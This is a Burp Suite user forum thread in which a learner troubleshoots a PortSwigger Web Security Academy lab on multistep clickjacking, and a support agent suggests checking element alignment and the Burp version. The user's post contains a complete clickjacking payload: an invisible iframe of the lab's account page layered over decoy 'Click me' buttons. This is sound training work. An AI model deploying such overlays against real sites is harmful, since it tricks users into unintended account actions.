Burp Suite User Forum

Create new post

[Lab] Multistep clickjacking not being solved

dnishioka | Last updated: Sep 04, 2024 01:00PM UTC

I followed that solution and the community solution, but that lab did not solve the problem. We are using BurpSuite's Chromium to verify the operation. I need you to tell me what you need to do to resolve this. The following payloads are used. ------ <style> iframe { position:relative; width:1000px; height: 800px; opacity:0; z-index: 2; } .firstClick, .secondClick { position:absolute; top:540px; left:65px; z-index: 1; } .secondClick { top:310px; left:200px; } </style> <div class="firstClick">Click me first</div> <div class="secondClick">Click me next</div> <iframe src="https://0a96004503fe5fff80065367008f00b1.web-security-academy.net/my-account"></iframe>

Ben, PortSwigger Agent | Last updated: Sep 05, 2024 07:02AM UTC

Hi, A couple of things to check: If you use the 'View exploit' functionality within the lab do the div elements line up with the corresponding buttons? Secondly, which version of Burp are you using when you attempt this lab - there were some issues with these labs when you used the embedded browser in older versions of Burp but this should now work in the latest version of Burp using the updated version of Chromium that the embedded browser is based on.

dnishioka | Last updated: Sep 07, 2024 08:42PM UTC

Hello I tried several times and could not solve the problem, but the next day I tried the same thing and it solved the problem. The cause remains unknown, but the problem has been resolved and I would like this case closed. Sorry for the inconvenience.

You must be an existing, logged-in customer to reply to a thread. Please email us for additional support.